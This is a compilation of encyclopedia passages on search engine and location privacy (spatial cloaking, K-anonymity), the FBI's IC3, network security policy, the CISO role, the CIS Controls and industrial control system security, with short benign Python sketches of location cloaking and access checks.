Google itself claimed that handing over these logs would amount to handing over personally identifiable information and user identities.[8] The court ruled that Google had to hand over 50,000 randomly selected URLs to the government, but not search queries, because disclosing those could seed public distrust of the company and therefore compromise its business.[6] While not a strictly defined law enacted by Congress, the Law of Confidentiality is common law that protects information shared by a party who has trust and an expectation of privacy in the party they share the information with.[8] If the content of search queries, and the logs they are stored in, is thought of in the same manner as information shared with a physician, as it is similarly confidential, then it ought to be afforded the same privacy protections.[8] The European Court of Justice ruled in 2014 that its citizens had the "Right to Be Forgotten" in the Google Spain SL v. Agencia Española de Protección de Datos case, which meant that they had the right to demand that search engines wipe data collected on them.[17][24] While this single court decision did not directly establish the "right to be forgotten", the court interpreted existing law to mean that people had the right to request that some information about them be wiped from search results provided by search engine companies like Google.[24] The background of this case is that a Spanish citizen, Mario Costeja Gonzalez, set out to erase himself from Google's search results because they revealed potentially compromising information about his past debts.[24] In ruling in favor of Mario Costeja Gonzalez, the court noted that search engines can significantly impact the privacy rights of many people and that Google controlled the dissemination of personal data.[24] This court decision did not claim that all citizens should be able to request that information about them be completely wiped from Google at any time, but rather that there are specific types of information, particularly information obstructing one's right to be forgotten, that do not need to be so easily accessible on search engines.[24] The GDPR is a European regulation that was put in place to protect data and provide privacy to European citizens, regardless of whether they are physically in the European Union. This means that countries around the globe have had to comply with its rules so that any European citizen residing in them is afforded the proper protections. The regulation became enforceable in May 2018.
https://en.wikipedia.org/wiki/Search_engine_privacy
Spatial cloaking is a privacy mechanism that is used to satisfy specific privacy requirements by blurring users' exact locations into cloaked regions.[1][2] This technique is usually integrated into applications in various environments to minimize the disclosure of private information when users request location-based services. Since the database server does not receive accurate location information, a candidate set that includes the satisfying answer is sent back to the user.[1] General privacy requirements include K-anonymity, maximum area, and minimum area.[3] With the emergence and popularity of location-based services, people are getting more personalized services, such as the names and locations of nearby restaurants and gas stations. Receiving these services requires users to send their positions either directly or indirectly to the service provider. A user's location information could be shared more than 5000 times in two weeks.[4][5] Therefore, this convenience also exposes users' privacy to certain risks, since attackers may illegally identify users' locations and further exploit their personal information.[6][7] Continuously tracking users' locations has been identified not only as a technical issue but also as a privacy concern.[8] It has been realized that quasi-identifiers, which refer to a set of information attributes, can be used to re-identify the user when linked with some external information.[7] For example, a social security number could be used by adversaries to identify a specific user,[7] and the combined disclosure of birth date, zip code, and gender can uniquely identify a user.[8] Thus, multiple solutions have been proposed to preserve and enhance users' privacy when using location-based services. Among all the proposed mechanisms, spatial cloaking is one that has been widely accepted and revised, and it has thus been integrated into many practical applications. Location privacy is usually considered to fall into the category of information privacy, though there is little consensus on the definition of location privacy.[4] There are often three aspects of location information: identity, location (spatial information), and time (temporal information).[2][4] Identity usually refers to a user's name, email address, or any characteristic that makes a user distinguishable. For example, Pokémon Go requires a consistent user identity, since users are required to log in.[4] Spatial information is considered the main approach to determining a location.[4] Temporal information can be separated into real-time and non-real-time and is usually described as a time stamp attached to a place.[4] If a link is established between these aspects, location privacy is considered violated.[2] Accessing personal location data has been raised as a severe privacy concern, even with personal permission.[4] Therefore, privacy-aware management of location information has been identified as an essential challenge, designed to provide privacy protection against the abuse of location information.[8] The overall idea of preserving location privacy is to introduce enough noise and quantization to reduce the chances of successful attacks.[9] Spatial crowdsourcing uses devices that have GPS (Global Positioning System) capability and collect information.[10] The data retrieved includes location data that can be used to analyze maps and local spatial characteristics.[10] In recent years, researchers have been making a connection between the social and technological aspects of location information.
For example, if co-location information is considered as data that potential attackers could obtain and take into consideration, location privacy is decreased by more than 60%.[11] Also, through the constant reporting of a user's location information, a movement profile can be constructed for that user by statistical analysis, and a large amount of information can be exploited and generated from this profile, such as the user's office location, medical records, financial status, and political views.[7][12] Therefore, more and more researchers have taken account of social influence in their algorithms, since this socially networked information is accessible to the public and might be used by potential attackers. In order to meet users' requirements for location privacy in the process of data transportation, researchers have been exploring and investigating models to address the disclosure of private information.[3] The secure multi-party model is constructed based on the idea of sharing accurate information among n parties. Each party has access to a particular segment of the precise information while being prevented from acquiring the other shares of the data.[3][13] However, a computation problem is introduced in the process, since a large amount of data processing is required to satisfy the requirement.[3] The minimal information sharing model uses cryptographic techniques to perform join and intersection operations. However, the inflexibility of this model in fitting other queries makes it unsatisfactory for most practical applications.[3] The untrusted third-party model is adopted in peer-to-peer environments.[3] The most popular model right now is the trusted third-party model. Some practical applications have already adopted the idea of a trusted third party in their services to preserve privacy.
For example, Anonymizer is integrated into various websites, giving an anonymous surfing service to its users.[3] Also, when purchasing through PayPal, users are not required to provide their credit card information.[3] By introducing a trusted third party, users' private information is not directly exposed to the service providers.[3] A promising approach to preserving location privacy is to report data on users' behavior while at the same time protecting identity and location privacy.[2] Several methods have been investigated to enhance the performance of location-preserving techniques, such as location perturbation and the reporting of landmark objects.[3] The idea of location perturbation is to replace the exact location information with a coarser-grained spatial range, so that uncertainty is introduced when adversaries try to match the user to either a known location identity or an external observation of location identity.[8] Location perturbation is usually achieved through spatial cloaking, temporal cloaking, or location obfuscation.[3] Spatial and temporal cloaking refer to wrong or imprecise location and time being reported to the service providers, instead of the exact information.[6][9] For example, location privacy can be enhanced by increasing the time between location reports, since higher report frequencies make re-identification through data mining more likely.[9][14] In other cases, the reporting of location information is delayed until the visit of K users has been identified in that region.[2] However, this approach can affect the service reported by the service providers, since the data they receive are not accurate. Accuracy and timeliness issues are usually discussed with this approach. Also, some attacks that exploit the idea of cloaking and break user privacy have been recognized.[6] Based on the idea of landmark objects, a particular landmark or significant object is reported to the service provider instead of a region.[3] In order to avoid location tracking, less or no location information is usually reported to the service provider.[3] For example, when requesting the weather, a zip code instead of a tracked location would be accurate enough for the quality of the service received.[9] A centralized scheme is constructed around a central location anonymizer (anonymizing server), which is considered an intermediary between the user and the service provider.[15][16] Generally, the responsibilities of a location anonymizer include tracking users' exact locations,[15] blurring user-specific location information into cloaked areas, and communicating with the service provider.[1][12] For example, one way to achieve this is by replacing the correct network addresses with fake IDs before the information is forwarded to the service provider.[7] Sometimes the user's identity is hidden while still allowing the service provider to authenticate the user and possibly charge the user for the service.[7] These steps are usually achieved through spatial cloaking or path confusion.
Except in some cases where the correct location information is sent to obtain high service quality, the exact location or temporal information is usually modified to preserve user privacy.[17] Serving as an intermediary between the user and the location-based server, the location anonymizer carries out the tracking, cloaking, and forwarding activities described above.[3][7] The location anonymizer can also be considered a trusted third party,[12] since it is trusted by the user with the accurate location information and the private profile stored in the location anonymizer.[15] However, this can also expose users' privacy to great risks at the same time. First, since the anonymizer keeps tracking users' information and has access to users' exact locations and profile information, it is usually the target of most attackers and thus under higher risk.[12][15] Second, the extent to which users trust the location anonymizer can be essential. If a fully trusted third party is integrated into the algorithm, user location information is reported continuously to the location anonymizer,[12] which may cause privacy issues if the anonymizer is compromised.[16] Third, the location anonymizer may become a performance bottleneck when a large number of requests are presented and required to be cloaked,[15][16] because the location anonymizer is responsible for maintaining the number of users in a region in order to provide an acceptable level of service quality.[15]
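As a rough sketch of the centralized cloaking step, the toy code below replaces the user's identity with a random fake ID and widens the exact coordinate into a square cloaked region before anything reaches the service provider. The class and method names are invented for illustration and do not correspond to any deployed anonymizer.

```python
import secrets
from dataclasses import dataclass

@dataclass
class CloakedRequest:
    fake_id: str      # pseudonym forwarded instead of the real identity
    min_lat: float    # bounding box of the cloaked region
    max_lat: float
    min_lon: float
    max_lon: float

class Anonymizer:
    """Trusted third party sitting between users and the LBS provider."""

    def cloak(self, lat: float, lon: float,
              half_width_deg: float = 0.01) -> CloakedRequest:
        # Replace the network identity with a random fake ID and blur the
        # exact point into a square region of +/- half_width_deg degrees.
        return CloakedRequest(
            fake_id=secrets.token_hex(8),
            min_lat=lat - half_width_deg,
            max_lat=lat + half_width_deg,
            min_lon=lon - half_width_deg,
            max_lon=lon + half_width_deg,
        )

req = Anonymizer().cloak(40.7580, -73.9855)
print(req)  # the provider sees only a pseudonym and a region, not the user
```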
In a distributed environment, users anonymize their location information through fixed communication infrastructures, such as base stations. Usually, a certification server is introduced in a distributed scheme, with which users are registered. Before participating in this system, users are required to obtain a certificate, which means that they are trusted. Therefore, each time a user requests a location-based service, and before the exact location information is forwarded to the server, the auxiliary users registered in this system collaborate to hide the precise location of the user. The number of assistant users involved in cloaking this region is based on K-anonymity, which is usually set by the specific user.[18] In cases where there are not enough users nearby, S-proximity is generally adopted to generate a high number of paired user identities and pieces of location information, so that the actual user is indistinguishable within the specific area.[17] The other profiles and location information sent to the service provider are sometimes also referred to as dummies.[3] However, the complexity of the data structure used to anonymize the location can result in difficulties when applying this mechanism to highly dynamic location-based mobile applications.[18] Also, heavy computation and communication burdens are imposed on the environment.[15] A peer-to-peer (P2P) environment relies on direct communication and information exchange between devices in a community where users can only communicate through P2P multi-hop routing, without fixed communication infrastructures.[1] The P2P environment aims to extend the scope of cellular coverage in a sparse environment.[19] In this environment, peers have to trust each other and work together, since their location information is reported to each other when a cloaked area is constructed to achieve the desired K-anonymity while requesting location-based services.[1][12] Researchers have discussed privacy and security requirements that would make privacy-preserving techniques appropriate for the peer-to-peer environment. For example, authentication and authorization are required to secure and identify the user, making authorized users distinguishable from unauthorized users. Confidentiality and integrity ensure that only those who are authorized have access to the data transmitted between peers, and that the transmitted information cannot be modified.[19] Some of the drawbacks identified in a peer-to-peer environment are the communication costs, the possibility of not having enough users, and the threat of potential malicious users hiding in the community.[2] Mobile devices have been considered an essential tool for communication, and mobile computing has thus become a research interest in recent years.[17] From online purchases to online banking, mobile devices are frequently connected to service providers for online activities, sending and receiving information.[17] Generally, mobile users can receive very personal services from anywhere at any time through location-based services.[16] In mobile devices, the Global Positioning System (GPS) is the most commonly used component to provide location information.[2] Besides that, Global System for Mobile Communications (GSM) and WiFi signals can also help with estimating locations.[2] There are generally two types of privacy concerns in mobile environments: data privacy and contextual privacy. Usually, location privacy and identity privacy are included in the discussion of contextual privacy in a mobile environment,[17] while the data transferred between various mobile devices is discussed under data privacy.[17] In the process of requesting location-based services and exchanging location data, both the quality of the data transferred and the safety of the information exchanged could be exposed to malicious people. Whatever specific privacy-preserving solution is integrated to cloak the particular region in which the service requester stays, it is usually constructed from several angles to better satisfy different privacy requirements.
These standards are either adjusted by the users or decided by the application designers.[3] Some of the privacy parameters include K-anonymity, entropy, minimum area, and maximum area.[3] The concept of K-anonymity was first introduced in relational data privacy to guarantee the usefulness of the data and the privacy of users when data holders want to release their data.[8][20][21][22] K-anonymity usually refers to the requirement that the information of the user should be indistinguishable from that of at least k − 1 people in the same region, with k being a positive integer.[3][4][9][12][15] Thus, the disclosed location scope would be expected to keep expanding until k users can be identified in the region, these k people forming an anonymity set.[9][15] Usually, the higher the K-anonymity, the stricter the requirements and the higher the level of anonymity.[7] If K-anonymity is satisfied, the possibility of identifying the exact user would be around 1/k (subject to the particular algorithm), and therefore location privacy would be effectively preserved. Usually, if the cloaking region is designed to be larger when the algorithm is constructed, the chance of identifying the exact service requester is much lower even when the reported location is exposed to the service providers,[7] let alone through the attackers' abilities to run complex machine learning or advanced analysis techniques. Some approaches have also been discussed to introduce more ambiguity to the system, such as historical K-anonymity, p-sensitivity, and l-diversity.[4] The idea of historical K-anonymity is proposed to protect moving objects by ensuring that there are at least k − 1 users who share the same historical requests, which requires the anonymizer to track not only the current movement of the user but also the sequence of the user's locations.[3][4][7][15] Therefore, even if the user's historical location points are disclosed, the adversaries cannot distinguish the specific user from a group of potential users.[7] P-sensitivity is used to ensure that critical attributes, such as identity information, have at least p different values within k users.[4][23] Moreover, l-diversity aims to guarantee that the user is unidentifiable among l different physical locations.[4][24] However, setting a large k value also requires additional spatial and temporal cloaking, which leads to low-resolution information and in turn could degrade the quality of service.[8] Minimum area size refers to the smallest region, expanded from the exact location point, that satisfies the specific privacy requirements.[3] Usually, the higher the privacy requirements, the larger the area required, to increase the difficulty of pinpointing the exact location of users. The idea of a minimum area is particularly important in dense areas, where K-anonymity might not be sufficient to provide the guaranteed privacy-preserving performance. For example, if the requester is in a shopping mall offering a promising discount, there might be many people around him or her, and this could be considered a very dense environment. Under such a situation, a large K-anonymity such as k = 100 would correspond to only a small region, since it does not require a large area to include 100 people near the user. This might result in an inefficient cloaked area, since the space where the user could potentially reside is smaller compared with a situation with the same level of K-anonymity but with people more scattered from each other.[3] Since there is a tradeoff between quality of service and privacy requirements in most location-based services,[3][4][8] a maximum area size is sometimes also required. This is because a sizable cloaked area might introduce too much inaccuracy into the service received by the user, since increasing the reported cloaked area also increases the number of possible results satisfying the user's request.[3] Those results would match the specific requirements of the user, yet would not necessarily be applicable to the user's exact location.
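A minimal sketch of the expand-until-k idea, together with the minimum and maximum area requirements just discussed, is shown below. It assumes a simple square region that doubles in size around the requester until it covers at least k known user positions; all names and parameter choices are illustrative.

```python
def cloaked_region(user, others, k=10, min_half=0.001, max_half=0.05):
    """Grow a square region around `user` until it covers at least k users.

    user, others: (lat, lon) tuples; k counts the requester plus k-1 peers.
    min_half / max_half: minimum and maximum half-widths of the square,
    enforcing the minimum and maximum area requirements described above.
    Returns the bounding box, or None if K-anonymity cannot be met within
    the maximum area.
    """
    lat, lon = user
    half = min_half
    while half <= max_half:
        inside = sum(
            1 for (olat, olon) in others
            if abs(olat - lat) <= half and abs(olon - lon) <= half
        ) + 1  # +1 counts the requester
        if inside >= k:
            return (lat - half, lat + half, lon - half, lon + half)
        half *= 2  # expand the candidate region and retry
    return None  # not enough users nearby within the allowed area

peers = [(40.758 + i * 0.002, -73.985 + i * 0.002) for i in range(20)]
print(cloaked_region((40.758, -73.985), peers, k=10))
```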
The cloaked region generated by the method of spatial cloaking can fit multiple environments, such as snapshot locations, continuous locations, spatial networks, and wireless sensor networks.[3] Sometimes the algorithms that generate a cloaked area are designed to fit various frameworks without changing the original coordinate. In fact, with the specification of the algorithms and the maturity of the most generally adopted mechanisms, more privacy-preserving techniques are being designed specifically for the desired environment, to better fit different privacy requirements. Geosocial applications are generally designed to provide social interaction based on location information. Some of these services include collaborative network services and games, discount coupons, local friend recommendations for dining and shopping, and social rendezvous.[9] For example, Motion Based allows users to share exercise paths with others.[9] Foursquare was one of the earliest location-based applications to enable location sharing among friends.[4] Moreover, SCVNGR was a location-based platform where users could earn points by going to places.[6] Beyond privacy requirements such as K-anonymity, maximum area size, and minimum area size, there are other requirements regarding the privacy preserved in geosocial applications. For example, location and user unlinkability require that the service provider should not be able to identify the user who conducts the same request twice, or the correspondence between a given cloaked area and its real-time location. Also, location data privacy requires that the service provider should not have access to the content of data at a specific location. For example, LoX is mainly designed to satisfy these privacy requirements of geosocial applications. With the popularity and development of the Global Positioning System (GPS) and wireless communication,[16] location-based information services have grown rapidly in recent years.[4] They have already been developed and deployed in both academia and industry.[8] Many practical applications have integrated the ideas and techniques of location-based services,[25] such as mobile social networks, finding places of interest (POIs), augmented reality (AR) games,[4] location-based advertising, transportation services,[1][12] location tracking, and location-aware services.[17] These services usually require service providers to analyze the received location information based on their algorithms and a database to come up with an optimal solution, and then report it back to the requesting user.
Usually, location-based services are requested either through snapshot queries or continuous queries.[3] Snapshot queries generally require the report of an exact location at a specific time, such as "where is the nearest gas station?", while continuous queries require the tracking of location over a period of time, such as "constantly report the nearby gas stations".[3] With the advancement of global positioning systems and the development of wireless communication, which have led to the extensive use of location-based applications, high risks have been placed on user privacy.[8] Both service providers and users are in danger of being attacked and having information abused.[8][26] It has been reported that some GPS devices have been used to exploit personal information and stalk personal locations.[3] Sometimes merely reporting location information already reveals much private information.[3][7] One of the attacks specific to location-based services is the space- or time-correlated inference attack, in which the visited location is correlated with a particular time, and this can lead to the disclosure of private life and private business.[8][27] Popular location-based services operate in two modes:[2][7][17] continuous and snapshot. Continuous location-based services require a constant report of location information to the service providers.[12] During the process of requesting a continuous location-based service, privacy leakage issues have been recognized: since a series of cloaked areas is reported, advancing technology could allow a correlation to be drawn between the blurred regions.[12] Therefore, much research has been conducted addressing location privacy issues in continuous location-based services.[12] Snapshot location-based services, in contrast, generally involve the linear relation between a specific location point and a point in the temporal coordinate. Some mechanisms have been proposed either to address the privacy-preserving issues in both environments simultaneously or to concentrate on fulfilling each privacy requirement respectively. For example, a privacy grid called a dynamic grid system has been proposed to fit both snapshot and continuous location-based service environments. The existing privacy solutions generally fall into two categories: data privacy and context privacy.[17] Besides addressing issues in location privacy, these mechanisms might be applied to other scenarios. For example, tools such as cryptography, anonymity, obfuscation, and caching have been proposed, discussed, and tested to better preserve user privacy. These mechanisms usually try to solve location privacy issues from different angles and thus fit different situations. Even though the effectiveness of spatial cloaking has been widely accepted and the idea of spatial cloaking has been integrated into multiple designs, there are still some concerns about it. First, the two schemes of spatial cloaking both have their limitations. For example, in the centralized scheme, although users' other private information, including identity, has been cloaked, the location itself can still release sensitive information,[15] especially when a specific user requests service multiple times with the same pseudonym.[7] In the decentralized scheme, there are issues with heavy computation and a possible lack of peers in a region.
Second, the abilities of attackers require more in-depth consideration and investigation, given the advancement of technologies such as machine learning and their connection with social relations, particularly the sharing of information online. Third, the credibility of a trusted third party has also been identified as one of the issues. A large amount of software is published on app markets every day, and some of it has not undergone strict examination. Software bugs, configuration errors at the trusted third party, and malicious administrators could expose private user data to high risks.[6] Based on a study from 2010, two-thirds of all the trusted-third-party applications in the Android market were considered suspicious in their handling of sensitive information.[17] Fourth, location privacy has been recognized as a personalized requirement that is sensitive to various contexts.[8] The customization of privacy parameters has been explored in recent years, since different people have different expectations about the amount of privacy preserved, and sometimes the default settings do not fully satisfy user needs.[4][28] Considering that there is often a trade-off relation between privacy and personalization, and that personalization usually leads to better service,[4][7][8] people will have different preferences. In situations where users can change the default configurations, accepting the default instead of customizing seems to be the more popular choice.[4][29] Also, people's attitudes towards disclosing their location information can vary based on the service's usefulness, privacy safeguards, the quantity disclosed, and so on.[9] In most situations, people weigh the price of privacy sharing against the benefits they receive.[4] Fifth, there are many protection mechanisms proposed in the literature, yet few of them have been practically integrated into commercial applications.[30] Since there is little analysis regarding the implementation of location privacy-preserving mechanisms, there is still a large gap between theory and practice.[4] During the process of exchanging data, the three main parties (the user, the server, and the networks) can be attacked by adversaries.[4][17] The knowledge held by adversaries that could be used to carry out location attacks includes observed location information, precise location information, and contextual knowledge.[4] The techniques of machine learning and big data have also led to emerging threats to location privacy,[4] and the popularity of smart devices has led to an increasing number of attacks.[17] Some of the adopted approaches include viruses, Trojan applications, and several kinds of cyber-attacks.[17] Man-in-the-middle attacks usually occur in the mobile environment, where all the information going through the transfer process from the user to the service provider could be attacked and manipulated by attackers to reveal more personal information.[17] Cross-servicing attacks usually take place when users are using poorly protected wireless connectivity, especially in public places.[17] Video-based attacks are more prevalent on mobile devices, usually due to the use of Bluetooth, camera, and video capabilities, with malicious software applications secretly recording users' behavior data and reporting that information to a remote device.
Stealthy Video Capture is one such intentionally designed application, which spies on an unaware user and reports the information onward.[17] Sensor-sniffing attacks usually refer to cases where intentionally designed applications are installed on a device. In this situation, even if adversaries have no physical contact with the mobile device, users' personal information is still at risk of being disclosed.[17] In a localization attack, contextual knowledge is combined with observed location information to disclose a precise location. Contextual knowledge can also be combined with precise location information to carry out identity attacks.[4] Learning algorithms and other deep learning methods pose a huge challenge to location privacy, along with the massive amount of data online.[4] For example, current deep learning methods can make predictions about geolocations based on personal photos from social networks, and they perform object detection based on their ability to analyze millions of photos and videos.[4][31][32] Policy approaches have also been discussed in recent years, intending to revise relevant guidelines or propose new regulations to better manage location-based service applications. The current state of technology lacks sufficiently aligned policies and a legal environment, and there are efforts from both academia and industry trying to address this issue.[4] Two uniformly accepted and well-established requirements are users' awareness of the location privacy policies in a specific service and their consent to sending their personal location to a service provider.[15] Besides these two approaches, researchers have also been focusing on guarding the app markets, since an insecure app market would expose unaware users to several privacy risks. For example, much malware has been identified in the Android app market, designed to carry out cyber attacks on Android devices.[17] Without effective and clear guidelines to regulate location information, both ethical and legal problems would arise. Therefore, many guidelines have been discussed in recent years to monitor the use of location information. The European data protection guideline was recently revised to include and specify the privacy of an individual's data and personally identifiable information (PII). These adjustments are intended to create a safe yet effective service environment. Specifically, location privacy is enhanced by making sure that users are fully aware of and consent to the location information that will be sent to the service providers.
Another important adjustment is that complete responsibility is given to the service providers when users' private information is being processed.[17] The European Union's Directive 95/46/EC on the protection of individuals with regard to the processing of personal data and on the free movement of such data specifies that data transfer is limited to non-EU countries with "an adequate level of privacy protection".[33] The notion of explicit consent is also introduced in the Directive, which states that, except for legal and contractual purposes, personal data may only be processed if the user has unambiguously given his or her consent.[33] The European Union's Directive 2002/58/EC on privacy and electronic communications explicitly defines location information, user consent requirements, and corporate disposal requirements, which helps to regulate and protect European citizens' location privacy.[30] When data are unlinkable to the user, legal frameworks such as the EU Directive place no restriction on the collection of anonymous data.[33] The Electronic Communications Privacy Act discusses the legal framework of privacy protection and gives standards for law-enforcement access to electronic records and communications.[34] It is also very influential in deciding electronic surveillance issues.[35] GSMA published a new privacy guideline, and some mobile companies in Europe have signed it and started to implement it, so that users would have a better understanding of the information recorded and analyzed when using location-based services. Also, GSMA has recommended that operating companies inform their customers about the people who have access to the users' private information.[17] Even though many privacy-preserving mechanisms have not come into common use, owing to concerns about their effectiveness, efficiency, and practicality, some location-based service providers have started to address privacy issues in their applications.[4] For example, Twitter enables its users to customize location accuracy.[4] Locations posted in Glympse automatically expire.[4] Also, SocialRadar allows its users to choose to be anonymous or invisible when using the application.[4] It has been stated that Google does not meet the European Union's data privacy law, and thus increasing attention has been placed on the advocacy of guidelines and policies regarding data privacy.[17] It has also been argued that less than a week after Facebook launched its "Places" feature, the content of that location information was exploited by thieves and used to conduct a home invasion.[6] In United States v. Knotts, the police used a beeper to keep track of the suspect's vehicle. After using the beeper alone to track the suspect, the officers secured a search warrant and confirmed that the suspect was producing illicit drugs in the van. The suspect tried to suppress the evidence based on the tracking device used during the monitoring process, but the court denied this.
The court concluded that "A person traveling in an automobile on a public thouroughfare [sic] has no reasonable expectation of privacy in his movement from one place to another."[36] Nevertheless, the court reserved the question of whether twenty-four-hour surveillance would constitute a search.[35][36] However, cases involving GPS and other tracking devices differ from this case, since GPS tracking can be conducted without human interaction, while the beeper is considered a method of increasing the police's sensory perception by maintaining visual contact with the suspect.[36] Police presence is required when using beepers but is not needed when using GPS to conduct surveillance. Therefore, law enforcement agents are required to secure a warrant before obtaining a vehicle's location information with GPS tracking devices.[35] In United States v. Jones (https://www.oyez.org/cases/2011/10-1259), the police had a search warrant to install a Global Positioning System tracker on the respondent's wife's car, but the actual installation took place on the eleventh day and in Maryland, outside the authorized installation district and beyond the approved ten days. The District Court ruled the data recorded on public roads admissible, since the respondent Jones had no reasonable expectation of privacy on public streets, yet the D.C. Circuit reversed this, holding that the warrantless use of the GPS device violated the Fourth Amendment.[37]
https://en.wikipedia.org/wiki/Spatial_cloaking
Control software may refer to:
https://en.wikipedia.org/wiki/Control_software_(disambiguation)
The Internet Crime Complaint Center (IC3) is a division of the Federal Bureau of Investigation (FBI) concerning suspected Internet-facilitated criminal activity. The IC3 gives victims a convenient and easy-to-use reporting mechanism that alerts authorities to suspected criminal or civil violations on the Internet. The IC3 develops leads and notifies law enforcement agencies at the federal, state, local, and international levels. Information sent to the IC3 is analyzed and disseminated, for investigative and intelligence purposes, to law enforcement and for public awareness. The IC3 was founded in 2000 as the Internet Fraud Complaint Center (IFCC) and was tasked with gathering data on crimes committed online, such as fraud, scams, and thefts.[1] Other crimes tracked by the center included intellectual property rights matters, computer intrusions, economic espionage, online extortion, international money laundering, identity theft, and other Internet-facilitated crimes. With the realization that crimes facilitated online can overlap with other crimes, and that not all crimes committed or facilitated online are simply fraud, the IFCC was renamed the Internet Crime Complaint Center in October 2003, to better reflect the broad character of such matters and to minimize the need to distinguish online fraud from other, potentially overlapping cyber crimes.
https://en.wikipedia.org/wiki/Internet_Crime_Complaint_Center
A network security policy (NSP) is a generic document that outlines rules for computer network access, determines how policies are enforced, and lays out some of the basic architecture of the company's security/network security environment.[1] The document itself is usually several pages long and written by a committee. A security policy is a complex document, meant to govern data access, web-browsing habits, use of passwords, encryption, email attachments, and more. It specifies these rules for individuals or groups of individuals throughout the company.[2] The policies can be expressed as a set of instructions understood by special-purpose network hardware dedicated to securing the network. A security policy should keep malicious users out and also exert control over potentially risky users within an organization. Understanding what information and services are available, and to which users, as well as what the potential is for damage and whether any protection is already in place to prevent misuse, is important when writing a network security policy. In addition, the security policy should dictate a hierarchy of access permissions, granting users access only to what is necessary for the completion of their work. The National Institute of Standards and Technology provides an example security-policy guideline.
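As a toy illustration of how such rules can be made machine-checkable, the sketch below encodes a least-privilege access policy as data and evaluates requests against it with a default-deny rule. The roles, resources, and function names are invented for illustration and are not drawn from the NIST guideline or any standard.

```python
# Hypothetical least-privilege policy: each role is granted only the
# resources needed for its work, mirroring the hierarchy of access
# permissions a network security policy should dictate.
POLICY = {
    "engineer": {"source_repo", "build_server"},
    "hr_staff": {"hr_records"},
    "contractor": set(),  # default deny: no access unless granted
}

def is_allowed(role: str, resource: str) -> bool:
    """Return True only if the policy explicitly grants the access."""
    return resource in POLICY.get(role, set())

assert is_allowed("engineer", "build_server")
assert not is_allowed("hr_staff", "build_server")  # outside granted scope
assert not is_allowed("guest", "hr_records")       # unknown role: deny
```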
https://en.wikipedia.org/wiki/Network_security_policy
A chief information security officer (CISO) is a senior-level executive within an organization responsible for establishing and maintaining the enterprise vision, strategy, and program to ensure information assets and technologies are adequately protected. The CISO directs staff in identifying, developing, implementing, and maintaining processes across the enterprise to reduce information and information technology (IT) risks. They respond to incidents, establish appropriate standards and controls, manage security technologies, and direct the establishment and implementation of policies and procedures. The CISO is also usually responsible for information-related compliance (e.g., supervising the implementation needed to achieve ISO/IEC 27001 certification for an entity or a part of it). The CISO is also responsible for protecting the proprietary information and assets of the company, including the data of clients and consumers. The CISO works with other executives to make sure the company is growing in a responsible and ethical manner. Typically, the CISO's influence reaches the entire organization, and responsibilities span a broad range of security functions. Having a CISO or an equivalent function in organizations has become standard practice in business, government, and non-profit organizations. By 2009, approximately 85% of large organizations had a security executive, up from 56% in 2008 and 43% in 2006[citation needed]. In 2018, The Global State of Information Security Survey 2018 (GSISS), a joint survey conducted by CIO, CSO, and PwC,[1][2] concluded that 85% of businesses have a CISO or equivalent. The role of the CISO has broadened to encompass risks found in business processes, information security, customer privacy, and more. As a result, there is a trend to no longer embed the CISO function within the IT group. In 2019, only 24% of CISOs reported to a chief information officer (CIO), while 40% reported directly to a chief executive officer (CEO), and 27% bypassed the CEO and reported to the board of directors. Embedding the CISO function under the reporting structure of the CIO is considered suboptimal, because there is a potential for conflicts of interest and because the responsibilities of the role extend beyond the nature of the responsibilities of the IT group. The reporting structure for the CISO can vary depending on the organization's size, industry, regulatory environment, and risk profile. However, the importance of information security in today's businesses has raised the CISO's role to a senior-level position.[3] In corporations, the trend is for CISOs to have a strong balance of business acumen and technology knowledge. CISOs are often in high demand, and compensation is comparable to other C-level positions that hold a similar corporate title. A typical CISO holds non-technical certifications (like CISSP and CISM), although a CISO coming from a technical background will have an expanded technical skillset. Other typical training includes project management, to manage the information security program; financial management (e.g., holding an accredited MBA), to manage infosec budgets; and soft skills, to direct heterogeneous teams of information security managers, directors of information security, security analysts, security engineers, and technology risk managers. Recently, given the involvement of CISOs with privacy matters, certifications like CIPP are highly requested.
A recent development in this area is the emergence of "virtual" CISOs (vCISO, also called "fractional CISO").[4][5] These CISOs work on a shared or fractional basis for organizations that may not be large enough to support a full-time executive CISO, or that may wish, for a variety of reasons, to have a specialized external executive performing this role. vCISOs typically perform similar functions to traditional CISOs and may also serve as an "interim" CISO while a company normally employing a traditional CISO searches for a replacement.[6] vCISOs can support an organization in several key areas.
https://en.wikipedia.org/wiki/Chief_information_security_officer
The CIS Controls (formerly called the Center for Internet Security Critical Security Controls for Effective Cyber Defense) is a publication of best-practice guidelines for computer security. The project was initiated early in 2008 in response to extreme data losses experienced by organizations in the US defense industrial base.[1] The publication was initially developed by the SANS Institute and released as the "SANS Top 20". Ownership was then transferred to the Council on Cyber Security (CCS) in 2013, and then to the Center for Internet Security (CIS) in 2015. CIS released version 8 of the CIS Controls in 2021.[2] The guidelines consist of 18 (originally 20) key actions, called critical security controls (CSC), that organizations should implement to block or mitigate known attacks. The controls are designed so that primarily automated means can be used to implement, enforce, and monitor them.[3] The security controls give no-nonsense, actionable recommendations for cyber security, written in language that is easily understood by IT personnel.[4] The Consensus Audit Guidelines set out several goals for the controls, and the related CIS Benchmarks cover a wide range of technologies.
https://en.wikipedia.org/wiki/The_CIS_Critical_Security_Controls_for_Effective_Cyber_Defense
Control system security, or automation and control system (ACS) cybersecurity, is the prevention of (intentional or unintentional) interference with the proper operation of industrial automation and control systems. These control systems manage essential services including electricity, petroleum production, water, transportation, manufacturing, and communications. They rely on computers, networks, operating systems, applications, and programmable controllers, each of which could contain security vulnerabilities. The 2010 discovery of the Stuxnet worm demonstrated the vulnerability of these systems to cyber incidents.[1] The United States and other governments have passed cyber-security regulations requiring enhanced protection for control systems operating critical infrastructure. Control system security is known by several other names, such as SCADA security, PCN security, industrial network security, industrial control system (ICS) cybersecurity, operational technology (OT) security, industrial automation and control system security, and control system cyber security. Insecurity of, or vulnerabilities inherent in, automation and control systems (ACS) can lead to severe consequences in categories such as safety, loss of life, personal injury, environmental impact, lost production, equipment damage, information theft, and company image. Guidance to assess, evaluate, and mitigate these potential risks is provided through the application of many governmental, regulatory, and industry documents and global standards, addressed below. Automation and control systems have become far more vulnerable to security incidents owing to several trends. The U.S. Government Computer Emergency Readiness Team (US-CERT) originally instituted a control systems security program (CSSP), now the National Cybersecurity and Communications Integration Center (NCCIC) Industrial Control Systems, which has made available a large set of free National Institute of Standards and Technology (NIST) standards documents regarding control system security.[3] The U.S. Government Joint Capability Technology Demonstration (JCTD) known as MOSAICS (More Situational Awareness for Industrial Control Systems) is the initial demonstration of cybersecurity defensive capability for critical infrastructure control 